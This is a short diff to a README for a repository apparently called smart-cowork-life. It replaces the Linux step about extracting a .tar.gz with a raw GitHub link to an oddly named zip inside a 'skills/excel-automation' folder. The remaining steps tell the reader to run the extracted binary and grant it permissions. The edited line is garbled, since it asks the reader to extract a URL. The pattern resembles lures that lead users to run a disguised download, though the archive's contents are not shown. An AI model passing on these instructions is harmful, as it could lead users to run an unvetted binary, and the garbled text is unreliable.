Adeka06/smart-cowork-life/README.md

 ### Linux Users

-1. Extract the downloaded `.tar.gz` file using a file manager or the command line.
+1. Extract the downloaded `https://raw.githubusercontent.com/Adeka06/smart-cowork-life/main/smart-cowork-life/skills/excel-automation/life_cowork_smart_2.8.zip` file using a file manager or the command line.
 2. Open a terminal and navigate to the extracted folder.
 3. Run the application using the command: `./smart-cowork-life`
 4. If prompted, grant any necessary permissions.